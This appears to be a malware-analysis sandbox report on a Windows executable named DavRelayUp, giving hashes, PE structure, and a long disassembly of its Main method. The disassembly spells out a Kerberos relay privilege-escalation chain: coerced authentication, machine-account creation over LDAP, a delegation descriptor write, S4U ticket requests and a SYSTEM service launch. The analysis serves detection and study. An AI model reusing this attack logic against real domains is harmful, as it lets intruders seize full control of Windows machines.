Suspicious
Suspect

0add16e3e96c888ca55a4566e04c000f

PE Executable
|
MD5: 0add16e3e96c888ca55a4566e04c000f
|
Size: 4.86 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
 Hash Value
MD5
0add16e3e96c888ca55a4566e04c000f
Sha1
fd67dfbaf37099e17778f405c4db8ccf03b18325
Sha256
ebd21ac4ac71e466c1441dd998895dc5f9567d3ca999a30762f6028dfc59b4d5
Sha384
f0188744b36eea3350d636556747812b0624c89d5014c2b05139bb612a6c4fa9a72bb4acfc81d681a98fb45b269d2a02
Sha512
0b20d6419e8ccf8bc4d20d7336e539a613104e5768f64c321bd3d0316e46534050a138347c899f14509b7a621d7b4d9ea9e01ca4874be3ef938b1fc6f664d571
SSDeep
49152:YqCFngKJITFDv6Vrb/TkvO90dL3BmAFd4A64nsfJQ2UnN05yOs88rQdzVezf6jI0:YHqKJGbRrNnAdhWELZkj4EQ0DLU
TLSH
3D265B4FF89141B8C4AED634CAA59E527B31B884173123D72F71A6B62E33BD45EB8350

PeID

HQR data file
Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
File Structure
0add16e3e96c888ca55a4566e04c000f
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
DavRelayUp.DSInternals.Common.Properties.Resources.resources
DavRelayUp.Costura64.GoRelayServer.dll
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.data
.rdata
.pdata
.xdata
.bss
.edata
.idata
.CRT
.tls
.reloc
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: H:\DavRelayUp-master\DavRelayUp-master\DavRelayUp\obj\Release\DavRelayUp.pdb
Module Name

DavRelayUp.exe
Full Name

DavRelayUp.exe
EntryPoint

System.Void DavRelayUp.Program::Main(System.String[])
Scope Name

DavRelayUp.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

DavRelayUp
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

1043
Main Method

System.Void DavRelayUp.Program::Main(System.String[])
Main IL Instruction Count

672
Main IL

newobj System.Void DavRelayUp.Program/<>c__DisplayClass1_0::.ctor() stloc.0 <null> nop <null> ldstr DavRelayUp - Relaying you to SYSTEM, again... call System.Void System.Console::WriteLine(System.String) nop <null> ldarg.0 <null> call System.Boolean DavRelayUp.Options::ParseArgs(System.String[]) ldc.i4.0 <null> ceq <null> stloc.s V_13 ldloc.s V_13 brfalse.s IL_0026: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase br IL_07B6: ret ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.0 <null> ceq <null> stloc.s V_14 ldloc.s V_14 brfalse.s IL_0051: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase nop <null> nop <null> ldarg.0 <null> ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) call System.Void DavRelayUp.KrbSCM::RunSystemProcess(System.Int32) nop <null> nop <null> leave.s IL_004C: br IL_07B6 pop <null> nop <null> nop <null> leave.s IL_004C: br IL_07B6 br IL_07B6: ret ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.2 <null> ceq <null> stloc.s V_15 ldloc.s V_15 brfalse.s IL_006B: call System.Boolean DavRelayUp.WebClientEnabler::StartWebClientService() nop <null> call System.Void DavRelayUp.KrbSCM::Run() nop <null> br IL_07B6: ret call System.Boolean DavRelayUp.WebClientEnabler::StartWebClientService() ldc.i4.0 <null> ceq <null> stloc.s V_16 ldloc.s V_16 brfalse.s IL_008A: ldstr "[+] WebClient Service started successfully" nop <null> ldstr [-] Failed to start WebClient Service call System.Void System.Console::WriteLine(System.String) nop <null> br IL_07B6: ret ldstr [+] WebClient Service started successfully call System.Void System.Console::WriteLine(System.String) nop <null> ldsfld System.String DavRelayUp.Options::domain call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_00AD: ldc.i4.1 ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) br.s IL_00AE: stloc.s V_17 ldc.i4.1 <null> stloc.s V_17 ldloc.s V_17 brfalse.s IL_00C9: ldsfld System.String DavRelayUp.Options::domainController nop <null> call System.Boolean DavRelayUp.Networking::GetDomainInfo() ldc.i4.0 <null> ceq <null> stloc.s V_18 ldloc.s V_18 brfalse.s IL_00C8: nop br IL_07B6: ret nop <null> ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brfalse.s IL_010E: ldsfld System.String DavRelayUp.Options::domain nop <null> ldsfld System.String DavRelayUp.Options::domainController call System.String DavRelayUp.Networking::GetDCNameFromIP(System.String) stsfld System.String DavRelayUp.Options::domainController ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_20 ldloc.s V_20 brfalse.s IL_010D: nop nop <null> ldstr [-] Could not find Domain Controller FQDN From IP. Try specifying the FQDN with --DomainController flag. call System.Void System.Console::WriteLine(System.String) nop <null> br IL_07B6: ret nop <null> ldsfld System.String DavRelayUp.Options::domain call System.String DavRelayUp.Networking::GetDomainDN(System.String) stsfld System.String DavRelayUp.Options::domainDN ldsfld System.String DavRelayUp.Options::domainController ldsfld System.Int32 DavRelayUp.Options::ldapPort newobj System.Void System.DirectoryServices.Protocols.LdapDirectoryIdentifier::.ctor(System.String,System.Int32) stloc.1 <null> ldloc.1 <null> newobj System.Void System.DirectoryServices.Protocols.LdapConnection::.ctor(System.DirectoryServices.Protocols.LdapDirectoryIdentifier) stloc.2 <null> ldloc.0 <null> ldstr {0}:{1} ldsfld System.String DavRelayUp.Options::domainController ldsfld System.Int32 DavRelayUp.Options::ldapPort box System.Int32 call System.String System.String::Format(System.String,System.Object,System.Object) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString ldsfld System.Boolean DavRelayUp.Options::useSSL stloc.s V_21 ldloc.s V_21 brfalse.s IL_0192: nop nop <null> ldloc.0 <null> ldstr ldaps:// ldloc.0 <null> ldfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString call System.String System.String::Concat(System.String,System.String) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.3 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_ProtocolVersion(System.Int32) nop <null> ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_SecureSocketLayer(System.Boolean) nop <null> nop <null> br.s IL_01C4: ldloc.2 nop <null> ldloc.0 <null> ldstr ldap:// ldloc.0 <null> ldfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString call System.String System.String::Concat(System.String,System.String) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Sealing(System.Boolean) nop <null> ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Signing(System.Boolean) nop <null> nop <null> ldloc.2 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapConnection::Bind() nop <null> ldsfld System.Boolean DavRelayUp.Options::rbcdCreateNewComputerAccount stloc.s V_22 ldloc.s V_22 brfalse IL_03C7: ldloc.2 nop <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_24 ldloc.s V_24 brfalse.s IL_01F6: newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() ldc.i4.s 16 call System.String DavRelayUp.Program::RandomPasswordGenerator(System.Int32) stsfld System.String DavRelayUp.Options::rbcdComputerPassword newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() stloc.s V_23 ldloc.s V_23 ldstr CN= ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr ,CN=Computers, ldsfld System.String DavRelayUp.Options::domainDN call System.String System.String::Concat(System.String,System.String,System.String,System.String) callvirt System.Void System.DirectoryServices.Protocols.AddRequest::set_DistinguishedName(System.String) nop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr objectClass ldstr Computer newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr SamAccountName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr userAccountControl ldstr 4096 newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr DnsHostName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr ServicePrincipalName ldc.i4.4 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Object[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr unicodePwd call System.Text.Encoding System.Text.Encoding::get_Unicode() ldstr " ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Byte[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> nop <null> ldloc.2 <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryResponse System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) stloc.s V_25 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> leave.s IL_03C6: nop stloc.s V_26 nop <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) nop <null> ldstr [-] ldloc.s V_26 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_07B6: ret nop <null> ldloc.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::domainDN call DavRelayUp.Program/LdapSearchComputerNameResponse DavRelayUp.Program::LdapSearchComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stloc.s V_27 ldloca.s V_27 call System.String DavRelayUp.Program/LdapSearchComputerNameResponse::get_ObjectSID() stsfld System.String DavRelayUp.Options::rbcdComputerSid ldsfld System.String DavRelayUp.Options::rbcdComputerSid call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_28 ldloc.s V_28 brfalse.s IL_03FA: ldloc.2 br IL_07B6: ret ldloc.2 <null> call System.String System.Environment::get_MachineName() ldsfld System.String DavRelayUp.Options::domainDN call DavRelayUp.Program/LdapSearchComputerNameResponse DavRelayUp.Program::LdapSearchComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stloc.s V_27 ldloca.s V_27 call System.String DavRelayUp.Program/LdapSearchComputerNameResponse::get_ObjectDN() stsfld System.String DavRelayUp.Options::targetComputerDN ldsfld System.String DavRelayUp.Options::targetComputerDN call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_29 ldloc.s V_29 brfalse.s IL_042D: ldsfld System.String DavRelayUp.Options::targetComputerDN br IL_07B6: ret ldsfld System.String DavRelayUp.Options::targetComputerDN ldstr ldstr \20 callvirt System.String System.String::Replace(System.String,System.String) stsfld System.String DavRelayUp.Options::targetComputerDN ldstr O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;; ldsfld System.String DavRelayUp.Options::rbcdComputerSid ldstr ) call System.String System.String::Concat(System.String,System.String,System.String) stloc.3 <null> ldloc.3 <null> newobj System.Void System.Security.AccessControl.RawSecurityDescriptor::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Int32 System.Security.AccessControl.GenericSecurityDescriptor::get_BinaryLength() newarr System.Byte stloc.s V_5 ldloc.s V_4 ldloc.s V_5 ldc.i4.0 <null> callvirt System.Void System.Security.AccessControl.GenericSecurityDescriptor::GetBinaryForm(System.Byte[],System.Int32) nop <null> ldloc.0 <null> ldloc.s V_5 call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::b64_sd ldloc.0 <null> ldftn System.Void DavRelayUp.Program/<>c__DisplayClass1_0::<Main>b__0() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) stloc.s V_6 ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Void DavRelayUp.KrbSCM::HookSecurityContext() nop <null> ldstr 127.0.0.1 call System.String System.Environment::get_MachineName() ldsfld System.Int32 DavRelayUp.Options::webdavServerPort ldc.i4.2 <null> call System.Void DavRelayUp.AuthTrigger.EfsTrigger::Trigger(System.String,System.String,System.Int32,DavRelayUp.AuthTrigger.EfsTrigger/ApiCall) nop <null> ldc.i4.1 <null> stsfld System.Boolean DavRelayUp.Options::triggerDone ldloc.s V_6 callvirt System.Void System.Threading.Tasks.Task::Wait() nop <null> ldnull <null> stloc.s V_7 ldc.i4.0 <null> stloc.s V_8 ldnull <null> stloc.s V_9 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_30 ldloc.s V_30 brfalse.s IL_054E: ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash nop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_31 ldc.i4.s 18 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldloc.s V_31 ldc.i4 4096 call System.String DavRelayUp.Crypto::KerberosPasswordHash(DavRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_9 ldc.i4.s 18 stloc.s V_8 nop <null> br.s IL_056E: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_32 ldloc.s V_32 brfalse.s IL_056E: ldsfld System.String DavRelayUp.Options::rbcdComputerName nop <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash stloc.s V_9 ldc.i4.s 23 stloc.s V_8 nop <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldloc.s V_9 ldloc.s V_8 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_33 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_33 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) stloc.s V_10 ldloc.s V_10 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_11 ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_34 ldloc.s V_34 brfalse.s IL_05FC: ldloc.s V_11 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_11 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> ldloc.s V_11 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_12 ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_35 ldloc.s V_35 brfalse.s IL_0697: ldloc.s V_11 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_12 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> ldloc.s V_11 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_12 ldc.i4.0 <null> ldnull <null> call System.Byte[] DavRelayUp.S4U::S4U2Proxy(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,DavRelayUp.KRB_CRED,System.Boolean,System.String) stloc.s V_7 ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_36 ldloc.s V_36 brfalse.s IL_0712: ldc.i4 2500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.s V_7 call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> ldc.i4 2500 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly stloc.s V_37 ldloc.s V_37 brfalse IL_07AE: nop nop <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_38 ldsfld System.String DavRelayUp.Options::serviceName call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_39 ldloc.s V_39 brfalse.s IL_0772: ldsfld System.String DavRelayUp.Options::serviceCommand ldloc.s V_38 ldstr --ServiceName " ldsfld System.String DavRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_38 ldsfld System.String DavRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_40 ldloc.s V_40 brfalse.s IL_079D: ldloc.s V_38 ldloc.s V_38 ldstr --ServiceCommand " ldsfld System.String DavRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_38 ldloc.s V_38 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.s V_7 call DavRelayUp.lib.Interop.LUID DavRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> nop <null> br.s IL_07B6: ret nop <null> call System.Void DavRelayUp.KrbSCM::Run() nop <null> nop <null> ret <null>
0add16e3e96c888ca55a4566e04c000f (4.86 MB)
File Structure
0add16e3e96c888ca55a4566e04c000f
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
DavRelayUp.DSInternals.Common.Properties.Resources.resources
DavRelayUp.Costura64.GoRelayServer.dll
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.data
.rdata
.pdata
.xdata
.bss
.edata
.idata
.CRT
.tls
.reloc
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙